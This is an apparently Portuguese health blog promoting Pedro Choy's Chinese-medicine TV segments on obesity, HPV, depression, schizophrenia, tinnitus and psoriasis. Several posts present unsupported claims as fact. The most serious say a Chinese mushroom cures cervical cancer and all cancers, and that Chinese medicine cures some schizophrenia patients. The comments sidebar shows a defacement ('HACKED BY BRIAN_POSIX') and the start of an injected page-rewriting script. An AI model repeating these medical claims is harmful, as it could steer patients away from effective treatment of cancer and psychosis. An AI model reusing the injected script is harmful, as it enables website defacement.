saudeyinyang @ 18:34

Sex, 12/04/13

"Ser Colérico" ou "Ter maus Fígados" são frases alusivas a características da personalidade, relativas a ser agressivo e que remetem a causa dessas emoções para o fígado.

O curioso é que a medicina chinesa atribuí estas características mentais a alterações da energia do fígado. Ou seja não é por acaso que outras culturas humanas chegaram à mesma conclusão traduzindo-a em dizeres.

O Fígado em medicina chinesa desempenha um papel fundamental em etiopatogenia de múltiplas doenças, quer de natureza orgânica, funcional, ou psicológica.

Diagnosticar precocemente esta alteração do fígado pode mais do que tratar um problema já existente, prevenir doenças tão graves quanto o Acidente Vascular Cerebral, a enxaqueca ou a infertilidade...

Veja-nos na próxima Crónica "Saúde Yin e Yang" na próxima segunda feira dia 15, pelas 17:30 na SIC Mulher!

E se não viu. Veja o vídeo aqui!

 




Tags:


saudeyinyang @ 18:34

Sex, 15/03/13

Muitas vezes ouvimos a seguinte expressão: “Nós somos aquilo que comemos”.

Infelizmente, cada vez mais, e segundo dados da OMS (Organização Mundial de Saúde), a obesidade, ou o consecutivo aumento/excesso de peso são a quinta maior causa de morte no mundo e cerca de 150 milhões de pessoas acima dos 20 anos de idade são obesas.

No nosso país, a prevalência da obesidade é estimada em 13% para o sexo masculino e 15% para o sexo feminino e a direcção geral de saúde estima que, se nada se fizer para prevenir a obesidade, cerca de 50% da população portuguesa poderá ser obesa em 2025.

Estes valores alarmam todos os especialistas na área da saúde, visto que a obesidade é uma condição complexa de dimensões sociais, biológicas e psicossociais consideráveis, podendo eventualmente afectar qualquer pessoa de qualquer idade ou grupo socioeconómico, em qualquer parte do mundo.

Esta desordem já é encarada por muitos a epidemia do séc. XXI.
http://www.obesidade.info/obesidade.htm

 

Por isso não perca o Mais Mulher desta segunda-feira, e veja com os seus próprios olhos, casos de sucesso através do processo de equilíbrio Yin Yang.

 

E se não viu. Veja o vídeo aqui!

 




Tags:


saudeyinyang @ 18:33

Sex, 15/02/13

Muitas mulheres em consulta de rotina ginecológica, descobrem feridas no colo do útero ou anomalias das células epiteliais, num exame chamado papanicolau (microscópia de esfregaço de células colhidas no colo do útero).
Aí colhe-se um pouco do liquido à volta do colo do útero e analisa-se para presença de DNA do Vírus HPV, no sentido de se encontrar ou não, as estirpes que são consideradas capazes induzir cancro do colo do útero, essas "feridas" já por si são maioritariamente causadas pelo HPV.

O resultado chega numa analise intitulada Imunoserologia.


É aqui que as mulheres se assustam:
- Vão à internet e descobrem que aqueles valores alterados, significa que são portadoras dum Vírus chamado HPV, que por sua vez é apontado como sendo a principal causador do cancro do colo do útero.

O mais interessante é que nos últimos anos vários estudos científicos provaram que um cogumelo Chines é de facto eficaz a tratar o HPV e que cura o cancro do colo do útero. O próprio IPO de Coimbra publicou um desses trabalhos concluindo pela eficácia deste cogumelo.
http://www.cienciahoje.pt/index.php?oid=26176&op=all

Trata-se do Yun Zhi ou Coriolus Versicolor, usado à décadas para tratar infeções por vírus (HPV ou hepatite, por exemplo), e há cerca de 2000 anos para tratar todos os tipos de cancro. Sendo que desde que exerço sempre foi uma das ervas de eleição por mim usadas no HPV, nas viroses e doença oncológica.

 

Por isso, não perca nada das soluções naturais da medicina chinesa, no Mais Mulher desta segunda-feira, às 17:30 na SIC Mulher!

 

Mas se não viu. Veja o vídeo aqui!

 


Tags:


saudeyinyang @ 16:22

Sex, 14/12/12

Em Medicina Chinesa avaliamos uma outra parte do ser humano não identificável em medicina convencional, avaliamos a energia.
Por comparação, costumo usar o telemóvel e a carga da bateria. O que permite o telemóvel funcionar não é só a sua parte física, mas sim também a carga da sua bateria.


Os  exames usados em medicina (Rx, ressonância, TAC, etc...) dão rigorosamente o mesmo resultado, num telemóvel de bateria cheia ou vazia, mas a diferença é gritante porque se a bateria estiver cheia funciona e se tiver vazia não funciona.

O Homem tal como o telemóvel tem as suas "baterias", "quando bem carregadas promovem saúde, se tiverem pouca carga promovem “doença", é essa carga energética que avaliamos em medicina chinesa para diagnosticar o estado de saúde e doença.

Para tanto recorremos a vários critérios dos quais os mais conhecidos são a observação da língua e a palpação do pulso...

 

Saiba como, com Pedro Choy! No Mais Mulher desta segunda-feira.

 

Às 17:30 na SIC Mulher...

 

Veja o vídeo aqui!


Tags:


saudeyinyang @ 18:34

Sex, 16/11/12

Sabia que uma depressão crónica pode ser causada por anemia e outras alterações do sangue?


É o que pensa a medicina chinesa que trata também as depressões pós parto, promovendo melhorias do sangue na sua quantidade e qualidade.

 

Aproveite estes conselhos da Medicina Chinesa, para contornar os obstáculos da sua vida! E alimente o seu sangue, para que mantenha sempre as emoções bem fortes!

 

Não perca este e outros concelhos, que Pedro Choy nos trás na rubrica Saúde Yin Yang, desta segunda-feira no Mais Mulher!

 

Veja o vídeo aqui!


Tags:


saudeyinyang @ 10:11

Seg, 15/10/12

À mais de 20 anos que trato Anorexia e Bulimia pela medicina chinesa, o elevado número de casos acabou por me levar à minha própria metodologia, baseada é certo na visão que a medicina chinesa tem da doença. O mais interessante é o facto de 20 anos atras a minha abordagem ser considerada uma "heresia" para a medicina convencional, e hoje essa mesma abordagem encontrar eco na própria medicina convencional.

 

Veja o vídeo aqui!


Tags:


saudeyinyang @ 18:20

Sex, 14/09/12

O termo esquizofrenia surge por volta de 1910, sendo Júlio de Matos, um dos primeiros Médicos do mundo a usar o termo. Antes falava-se de "Delírios de perseguição e de grandezas"
O seu trabalho de investigação teve a maior importância para a classificação e entendimento da doença.

A china descobre a esquizofrenia no século III chamando-lhe:
精神分裂 Jīng Shén Fēn Liè, sendo que:
- "Jing" significa congénito ( já se nasce assim);
- "Shen" é uma parte da energia do coração que funciona como maestro das emoções, sem Shen as emoções são como uma orquestra sem maestro, cada instrumento toca para seu lado e a seu tempo sem qualquer coordenação;
- "Fen Lié" significa distinguir o certo do errado.
Resumindo: Esquizofrenia é uma doença que já nasce com o indivíduo, que se manifesta por falta de coordenação do mental, e que origina uma incapacidade de distinguir o real do imaginário.
Por outro lado, Shen e Jing têm suporte anatómico no homem e podem ser tratados podendo agir-se no portador desta doença melhorando muitos e curando outros.

As duas medicinas juntas complementam-se, pois a convencional por via dos fármacos é mais rápida a inibir os sintomas psicóticos, e a Medicina Chinesa é eficaz a restituir proatividade, repondo a competência para a vida familiar, social e profissional, que é o ponto em que falha a medicina convencional.

Para saber mais, assista à nossa próxima crónica Saúde Yin e Yang. Sob o tema esquizofrenia.

Pedro Choy


Tags:


saudeyinyang @ 18:15

Sex, 27/07/12

Os zumbidos ouvem-se, num ouvido, em ambos ou dentro do cérebro; há quem os ouça fora da cabeça à volta do crânio. Sendo que esse ruído na verdade não existe, é uma alucinação auditiva.
Quando o zumbido é forte causa grande perda de qualidade de vida: incomoda, irrita, enerva, deprime, não deixa dormir, perturba a atenção a concentração e a aprendizagem.

Há uma doença perigosa que pode causar zumbidos, o tumor cerebral...

O que causa o zumbido?
A medicina ocidental desconhece a causa, daí aparecerem as mais variadas explicações...
Para o ocidente o zumbido é um incomodo que aparece e acompanha o doente para o resto da vida agravando ao longo da vida.

Assista à nossa próxima crónica "Saude Yin Yang", temos varias sugestões para quem sofre deste incomodo problema de saúde...


Tags:


saudeyinyang @ 18:34

Qui, 14/06/12

A psoríase é uma doença de pele até há pouco de causa desconhecida, mas atualmente considerada autoimune. Manifesta-se sob a forma de placas avermelhadas ou brancas de bordos vermelhos que crescem e descamam.
Atinge 5% da população Europeia não havendo estatística para Portugal. Homens e mulheres são atingidos de igual forma.
A Psoríase não se contagia e não se transmite por qualquer outra via. Afirma a medicina chinesa que a diagnostica e trata desde há mais de 2000 anos, nunca a tendo confundido com a Lepra.
Para a Medicina Chinesa a doença é um desequilibro da relação entre o rim (que simboliza a Àgua) e o Fígado (que simboliza o Fogo), por vazio da energia renal há um desequilíbrio do fígado que passa a metabolizar mal.
É engraçado que esta nova classificação da Psoríase como sendo autoimunidade aproxima as duas medicinas pois, o Rim (causa em Medicina Chinesa) inclui a supra renal que é a glândula hormonal responsável pela imunidade. Há recomendações que damos a todos os doentes de natureza alimentar e de estilo de vida.

Na próxima crónica Yin Yang, vamos falar sobre esta patologia!


Tags:


saudeyinyang @ 12:24

Sex, 11/05/12

As raparigas pré-adolescentes portuguesas são as que mais sofrem de problemas de obesidade a seguir às norte-americanas, concluiu um estudo realizado pela Organização Mundial de Saúde.

 

Desde que exerce medicina chinesa Pedrp Choy trata pessoas para emagrecer e/ou adelgaçar em zonas localizadas.

Com o tempo acabou por criar o seu próprio método, apenas praticado nas suas clinicas. Havendo em cada clinica Pedro Choy uma equipa dedicada a adelgaçar e emagrecer.

No Mais Mulher apresentará  três casos:
1- Um Homem de 62 anos com ginecomastia ( aumento de tamanho da glândula mamaria).
2- Uma Jovem de 27 anos com grande quantidade de celulite.
3- Uma senhora de 56 anos com muita celulite, flacidez da pele e músculos e excesso ponderal

 

Não perca os resultados fantásticos!

 






Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO